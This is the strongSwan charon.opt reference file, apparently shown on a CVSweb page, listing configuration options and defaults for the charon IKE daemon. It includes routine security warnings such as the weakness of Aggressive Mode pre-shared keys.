1: charon {}
2: Options for the charon IKE daemon.
3:
4: Options for the charon IKE daemon.
5:
6: **Note**: Many of the options in this section also apply to **charon-cmd**
7: and other **charon** derivatives. Just use their respective name (e.g.
8: **charon-cmd** instead of **charon**). For many options defaults can be
9: defined in the **libstrongswan** section.
10:
11: charon.accept_private_algs = no
12: Deliberately violate the IKE standard's requirement and allow the use of
13: private algorithm identifiers, even if the peer implementation is unknown.
14:
15: charon.accept_unencrypted_mainmode_messages = no
16: Accept unencrypted ID and HASH payloads in IKEv1 Main Mode.
17:
18: Accept unencrypted ID and HASH payloads in IKEv1 Main Mode.
19:
20: Some implementations send the third Main Mode message unencrypted, probably
21: to find the PSKs for the specified ID for authentication. This is very
22: similar to Aggressive Mode, and has the same security implications: A
23: passive attacker can sniff the negotiated Identity, and start brute forcing
24: the PSK using the HASH payload.
25:
26: It is recommended to keep this option to no, unless you know exactly
27: what the implications are and require compatibility to such devices (for
28: example, some SonicWall boxes).
29:
30: charon.block_threshold = 5
31: Maximum number of half-open IKE_SAs for a single peer IP.
32:
33: charon.cert_cache = yes
34: Whether relations in validated certificate chains should be cached in
35: memory.
36:
37: charon.cache_crls = no
38: Whether Certificate Revocation Lists (CRLs) fetched via HTTP or LDAP should
39: be saved under a unique file name derived from the public key of the
40: Certification Authority (CA) to **/etc/ipsec.d/crls** (stroke) or
41: **/etc/swanctl/x509crl** (vici), respectively.
42:
43: charon.check_current_path = no
44: Whether to use DPD to check if the current path still works after any
45: changes to interfaces/addresses.
46:
47: By default, after detecting any changes to interfaces and/or addresses no
48: action is taken if the current path to the remote peer still looks usable.
49: Enabling this option will use DPD to check if the path actually still works,
50: or, for instance, the peer removed the state after a longer phase without
51: connectivity. It will also trigger a MOBIKE update if NAT mappings were
52: removed during the downtime.
53:
54: charon.cisco_flexvpn = no
55: Send the Cisco FlexVPN vendor ID payload (IKEv2 only).
56:
57: Send the Cisco FlexVPN vendor ID payload, which is required in order to make
58: Cisco brand devices allow negotiating a local traffic selector (from
59: strongSwan's point of view) that is not the assigned virtual IP address if
60: such an address is requested by strongSwan. Sending the Cisco FlexVPN
61: vendor ID prevents the peer from narrowing the initiator's local traffic
62: selector and allows it to e.g. negotiate a TS of 0.0.0.0/0 == 0.0.0.0/0
63: instead. This has been tested with a "tunnel mode ipsec ipv4" Cisco
64: template but should also work for GRE encapsulation.
65:
66: charon.cisco_unity = no
67: Send Cisco Unity vendor ID payload (IKEv1 only).
68:
69: charon.close_ike_on_child_failure = no
70: Close the IKE_SA if setup of the CHILD_SA along with IKE_AUTH failed.
71:
72: charon.cookie_threshold = 10
73: Number of half-open IKE_SAs that activate the cookie mechanism.
74:
75: charon.crypto_test.bench = no
76: Benchmark crypto algorithms and order them by efficiency.
77:
78: charon.crypto_test.bench_size = 1024
79: Buffer size used for crypto benchmark.
80:
81: charon.crypto_test.bench_time = 50
82: Time in ms during which crypto algorithm performance is measured.
83:
84: charon.crypto_test.on_add = no
85: Test crypto algorithms during registration (requires test vectors provided
86: by the _test-vectors_ plugin).
87:
88: charon.crypto_test.on_create = no
89: Test crypto algorithms on each crypto primitive instantiation.
90:
91: charon.crypto_test.required = no
92: Strictly require at least one test vector to enable an algorithm.
93:
94: charon.crypto_test.rng_true = no
95: Whether to test RNG with TRUE quality; requires a lot of entropy.
96:
97: charon.delete_rekeyed = no
98: Delete CHILD_SAs right after they got successfully rekeyed (IKEv1 only).
99:
100: Delete CHILD_SAs right after they got successfully rekeyed (IKEv1 only).
101: Reduces the number of stale CHILD_SAs in scenarios with a lot of rekeyings.
102: However, this might cause problems with implementations that continue to
103: use rekeyed SAs until they expire.
104:
105: charon.delete_rekeyed_delay = 5
106: Delay in seconds until inbound IPsec SAs are deleted after rekeyings (IKEv2
107: only).
108:
109: Delay in seconds until inbound IPsec SAs are deleted after rekeyings (IKEv2
110: only). To process delayed packets the inbound part of a CHILD_SA is kept
111: installed up to the configured number of seconds after it got replaced
112: during a rekeying. If set to 0 the CHILD_SA will be kept installed until it
113: expires (if no lifetime is set it will be destroyed immediately).
114:
115: charon.dh_exponent_ansi_x9_42 = yes
116: Use ANSI X9.42 DH exponent size or optimum size matched to cryptographic
117: strength.
118:
119: charon.dlopen_use_rtld_now = no
120: Use RTLD_NOW with dlopen when loading plugins and IMV/IMCs to reveal missing
121: symbols immediately.
122:
123: charon.dns1
124: DNS server assigned to peer via configuration payload (CP).
125:
126: charon.dns2
127: DNS server assigned to peer via configuration payload (CP).
128:
129: charon.dos_protection = yes
130: Enable Denial of Service protection using cookies and aggressiveness checks.
131:
132: charon.flush_auth_cfg = no
133: Free objects during authentication (might conflict with plugins).
134:
135: If enabled objects used during authentication (certificates, identities
136: etc.) are released to free memory once an IKE_SA is established. Enabling
137: this might conflict with plugins that later need access to e.g. the used
138: certificates.
139:
140: charon.follow_redirects = yes
141: Whether to follow IKEv2 redirects (RFC 5685).
142:
143: charon.force_eap_only_authentication = no
144: Violate RFC 5998 and use EAP-only authentication even if the peer did not
145: send an EAP_ONLY_AUTHENTICATION notify during IKE_AUTH.
146:
147: charon.fragment_size = 1280
148: Maximum size (complete IP datagram size in bytes) of a sent IKE fragment
149: when using proprietary IKEv1 or standardized IKEv2 fragmentation, defaults
150: to 1280 (use 0 for address family specific default values, which uses a
151: lower value for IPv4). If specified this limit is used for both IPv4 and
152: IPv6.
153:
154: charon.group
155: Name of the group the daemon changes to after startup.
156:
157: charon.half_open_timeout = 30
158: Timeout in seconds for connecting IKE_SAs (also see IKE_SA_INIT DROPPING).
159:
160: charon.hash_and_url = no
161: Enable hash and URL support.
162:
163: charon.host_resolver.max_threads = 3
164: Maximum number of concurrent resolver threads (they are terminated if
165: unused).
166:
167: charon.host_resolver.min_threads = 0
168: Minimum number of resolver threads to keep around.
169:
170: charon.i_dont_care_about_security_and_use_aggressive_mode_psk = no
171: Allow IKEv1 Aggressive Mode with pre-shared keys as responder.
172:
173: If enabled responders are allowed to use IKEv1 Aggressive Mode with
174: pre-shared keys, which is discouraged due to security concerns (offline
175: attacks on the openly transmitted hash of the PSK).
176:
177: charon.ignore_routing_tables
178: A space-separated list of routing tables to be excluded from route lookups.
179:
180: charon.ignore_acquire_ts = no
181: Whether to ignore the traffic selectors from the kernel's acquire events for
182: IKEv2 connections (they are not used for IKEv1).
183:
184: If this is disabled the traffic selectors from the kernel's acquire events,
185: which are derived from the triggering packet, are prepended to the traffic
186: selectors from the configuration for IKEv2 connection. By enabling this,
187: such specific traffic selectors will be ignored and only the ones in the
188: config will be sent. This always happens for IKEv1 connections as the
189: protocol only supports one set of traffic selectors per CHILD_SA.
190:
191: charon.ikesa_limit = 0
192: Maximum number of IKE_SAs that can be established at the same time before
193: new connection attempts are blocked.
194:
195: charon.ikesa_table_segments = 1
196: Number of exclusively locked segments in the hash table.
197:
198: charon.ikesa_table_size = 1
199: Size of the IKE_SA hash table.
200:
201: charon.inactivity_close_ike = no
202: Whether to close IKE_SA if the only CHILD_SA closed due to inactivity.
203:
204: charon.init_limit_half_open = 0
205: Limit new connections based on the current number of half open IKE_SAs, see
206: IKE_SA_INIT DROPPING in **strongswan.conf**(5).
207:
208: charon.init_limit_job_load = 0
209: Limit new connections based on the number of queued jobs.
210:
211: Limit new connections based on the number of jobs currently queued for
212: processing (see IKE_SA_INIT DROPPING).
213:
214: charon.initiator_only = no
215: Causes charon daemon to ignore IKE initiation requests.
216:
217: charon.install_routes = yes
218: Install routes into a separate routing table for established IPsec tunnels.
219:
220: charon.install_virtual_ip = yes
221: Install virtual IP addresses.
222:
223: charon.install_virtual_ip_on
224: The name of the interface on which virtual IP addresses should be installed.
225:
226: The name of the interface on which virtual IP addresses should be installed.
227: If not specified the addresses will be installed on the outbound interface.
228:
229: charon.integrity_test = no
230: Check daemon, libstrongswan and plugin integrity at startup.
231:
232: charon.interfaces_ignore
233: A comma-separated list of network interfaces that should be ignored, if
234: **interfaces_use** is specified this option has no effect.
235:
236: charon.interfaces_use
237: A comma-separated list of network interfaces that should be used by charon.
238: All other interfaces are ignored.
239:
240: charon.keep_alive = 20s
241: NAT keep alive interval.
242:
243: charon.keep_alive_dpd_margin = 0s
244: Number of seconds the keep alive interval may be exceeded before a DPD is
245: sent instead of a NAT keep alive (0 to disable). This is only useful if a
246: clock is used that includes time spent suspended (e.g. CLOCK_BOOTTIME).
247:
248: charon.leak_detective.detailed = yes
249: Includes source file names and line numbers in leak detective output.
250:
251: charon.leak_detective.usage_threshold = 10240
252: Threshold in bytes for leaks to be reported (0 to report all).
253:
254: charon.leak_detective.usage_threshold_count = 0
255: Threshold in number of allocations for leaks to be reported (0 to report
256: all).
257:
258: charon.load
259: Plugins to load in the IKE daemon charon.
260:
261: charon.load_modular = no
262: Determine plugins to load via each plugin's load option.
263:
264: If enabled, the list of plugins to load is determined via the value of the
265: _charon.plugins.<name>.load_ options. In addition to a simple boolean flag
266: that option may take an integer value indicating the priority of a plugin,
267: which would influence the order of a plugin in the plugin list (the default
268: is 1). If two plugins have the same priority their order in the default
269: plugin list is preserved. Enabled plugins not found in that list are ordered
270: alphabetically before other plugins with the same priority.
271:
272: charon.max_ikev1_exchanges = 3
273: Maximum number of IKEv1 phase 2 exchanges per IKE_SA to keep state about and
274: track concurrently.
275:
276: charon.max_packet = 10000
277: Maximum packet size accepted by charon.
278:
279: charon.make_before_break = no
280: Initiate IKEv2 reauthentication with a make-before-break scheme.
281:
282: Initiate IKEv2 reauthentication with a make-before-break instead of a
283: break-before-make scheme. Make-before-break uses overlapping IKE and
284: CHILD_SA during reauthentication by first recreating all new SAs before
285: deleting the old ones. This behavior can be beneficial to avoid connectivity
286: gaps during reauthentication, but requires support for overlapping SAs by
287: the peer. strongSwan can handle such overlapping SAs since version 5.3.0.
288:
289: charon.multiple_authentication = yes
290: Enable multiple authentication exchanges (RFC 4739).
291:
292: charon.nbns1
293: WINS servers assigned to peer via configuration payload (CP).
294:
295: charon.nbns2
296: WINS servers assigned to peer via configuration payload (CP).
297:
298: charon.port = 500
299: UDP port used locally. If set to 0 a random port will be allocated.
300:
301: charon.port_nat_t = 4500
302: UDP port used locally in case of NAT-T. If set to 0 a random port will be
303: allocated. Has to be different from **charon.port**, otherwise a random
304: port will be allocated.
305:
306: charon.prefer_best_path = no
307: Whether to prefer updating SAs to the path with the best route.
308:
309: By default, charon keeps SAs on the routing path with addresses it
310: previously used if that path is still usable. By setting this option to
311: yes, it tries more aggressively to update SAs with MOBIKE on routing
312: priority changes using the cheapest path. This adds more noise, but allows
313: to dynamically adapt SAs to routing priority changes. This option has no
314: effect if MOBIKE is not supported or disabled.
315:
316: charon.prefer_configured_proposals = yes
317: Prefer locally configured proposals for IKE/IPsec over supplied ones as
318: responder (disabling this can avoid keying retries due to INVALID_KE_PAYLOAD
319: notifies).
320:
321: charon.prefer_temporary_addrs = no
322: Controls whether permanent or temporary IPv6 addresses are used as source,
323: or announced as additional addresses if MOBIKE is used.
324:
325: By default, permanent IPv6 source addresses are preferred over temporary
326: ones (RFC 4941), to make connections more stable. Enable this option to
327: reverse this.
328:
329: It also affects which IPv6 addresses are announced as additional addresses
330: if MOBIKE is used. If the option is disabled, only permanent addresses are
331: sent, and only temporary ones if it is enabled.
332:
333: charon.process_route = yes
334: Process RTM_NEWROUTE and RTM_DELROUTE events.
335:
336: charon.processor.priority_threads {}
337: Section to configure the number of reserved threads per priority class
338: see JOB PRIORITY MANAGEMENT in **strongswan.conf**(5).
339:
340: charon.rdn_matching = strict
341: How RDNs in subject DNs of certificates are matched against configured
342: identities (_strict_, _reordered_, or _relaxed_).
343:
344: How RDNs in subject DNs of certificates are matched against configured
345: identities. Possible values are _strict_ (the default), _reordered_, and
346: _relaxed_. With _strict_ the number, type and order of all RDNs has to
347: match, wildcards (*) for the values of RDNs are allowed (that's the case
348: for all three variants). Using _reordered_ also matches DNs if the RDNs
349: appear in a different order, the number and type still has to match.
350: Finally, _relaxed_ also allows matches of DNs that contain more RDNs than
351: the configured identity (missing RDNs are treated like a wildcard match).
352:
353: Note that _reordered_ and _relaxed_ impose a considerable overhead on memory
354: usage and runtime, in particular, for mismatches, compared to _strict_.
355:
356: charon.receive_delay = 0
357: Delay in ms for receiving packets, to simulate larger RTT.
358:
359: charon.receive_delay_response = yes
360: Delay response messages.
361:
362: charon.receive_delay_request = yes
363: Delay request messages.
364:
365: charon.receive_delay_type = 0
366: Specific IKEv2 message type to delay, 0 for any.
367:
368: charon.replay_window = 32
369: Size of the AH/ESP replay window, in packets.
370:
371: charon.retransmit_base = 1.8
372: Base to use for calculating exponential back off, see IKEv2 RETRANSMISSION
373: in **strongswan.conf**(5).
374:
375: charon.retransmit_timeout = 4.0
376: Timeout in seconds before sending first retransmit.
377:
378: charon.retransmit_tries = 5
379: Number of times to retransmit a packet before giving up.
380:
381: charon.retransmit_jitter = 0
382: Maximum jitter in percent to apply randomly to calculated retransmission
383: timeout (0 to disable).
384:
385: charon.retransmit_limit = 0
386: Upper limit in seconds for calculated retransmission timeout (0 to disable).
387:
388: charon.retry_initiate_interval = 0
389: Interval in seconds to use when retrying to initiate an IKE_SA (e.g. if DNS
390: resolution failed), 0 to disable retries.
391:
392: charon.reuse_ikesa = yes
393: Initiate CHILD_SA within existing IKE_SAs (always enabled for IKEv1).
394:
395: charon.routing_table
396: Numerical routing table to install routes to.
397:
398: charon.routing_table_prio
399: Priority of the routing table.
400:
401: charon.rsa_pss = no
402: Whether to use RSA with PSS padding instead of PKCS#1 padding by default.
403:
404: charon.send_delay = 0
405: Delay in ms for sending packets, to simulate larger RTT.
406:
407: charon.send_delay_response = yes
408: Delay response messages.
409:
410: charon.send_delay_request = yes
411: Delay request messages.
412:
413: charon.send_delay_type = 0
414: Specific IKEv2 message type to delay, 0 for any.
415:
416: charon.send_vendor_id = no
417: Send strongSwan vendor ID payload
418:
419: charon.signature_authentication = yes
420: Whether to enable Signature Authentication as per RFC 7427.
421:
422: charon.signature_authentication_constraints = yes
423: Whether to enable constraints against IKEv2 signature schemes.
424:
425: If enabled, signature schemes configured in _rightauth_, in addition to
426: getting used as constraints against signature schemes employed in the
427: certificate chain, are also used as constraints against the signature scheme
428: used by peers during IKEv2.
429:
430: charon.spi_label = 0x0000000000000000
431: Value mixed into the local IKE SPIs after applying _spi_mask_.
432:
433: charon.spi_mask = 0x0000000000000000
434: Mask applied to local IKE SPIs before mixing in _spi_label_ (bits set will
435: be replaced with _spi_label_).
436:
437: charon.spi_min = 0xc0000000
438: The lower limit for SPIs requested from the kernel for IPsec SAs.
439:
440: The lower limit for SPIs requested from the kernel for IPsec SAs. Should not
441: be set lower than 0x00000100 (256), as SPIs between 1 and 255 are reserved
442: by IANA.
443:
444: charon.spi_max = 0xcfffffff
445: The upper limit for SPIs requested from the kernel for IPsec SAs.
446:
447: charon.start-scripts {}
448: Section containing a list of scripts (name = path) that are executed when
449: the daemon is started.
450:
451: charon.stop-scripts {}
452: Section containing a list of scripts (name = path) that are executed when
453: the daemon is terminated.
454:
455: charon.threads = 16
456: Number of worker threads in charon.
457:
458: Number of worker threads in charon. Several of these are reserved for long
459: running tasks in internal modules and plugins. Therefore, make sure you
460: don't set this value too low. The number of idle worker threads listed in
461: _ipsec statusall_ might be used as indicator on the number of reserved
462: threads.
463:
464: charon.tls.cipher
465: List of TLS encryption ciphers.
466:
467: charon.tls.key_exchange
468: List of TLS key exchange methods.
469:
470: charon.tls.mac
471: List of TLS MAC algorithms.
472:
473: charon.tls.suites
474: List of TLS cipher suites.
475:
476: charon.tls.ke_group
477: List of TLS key exchange groups.
478:
479: charon.tls.signature
480: List of TLS signature schemes.
481:
482: charon.tls.send_certreq_authorities = yes
483: Whether to include CAs in a server's CertificateRequest message.
484:
485: Whether to include CAs in a server's CertificateRequest message. May be
486: disabled if clients can't handle a long list of CAs.
487:
488: charon.tls.version_min = 1.2
489: Minimum TLS version to negotiate.
490:
491: charon.tls.version_max = 1.2
492: Maximum TLS version to negotiate.
493:
494: charon.user
495: Name of the user the daemon changes to after startup.
496:
497: charon.x509.enforce_critical = yes
498: Discard certificates with unsupported or unknown critical extensions.
FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>
![[BACK]](/icons/cvsweb/back.gif){kind=icon}
Return to charon.opt CVS log ![[TXT]](/icons/cvsweb/text.gif){kind=icon}
![[DIR]](/icons/cvsweb/dir.gif){kind=icon}
Up to [ELWIX - Embedded LightWeight unIX -] / embedaddon / strongswan / conf / options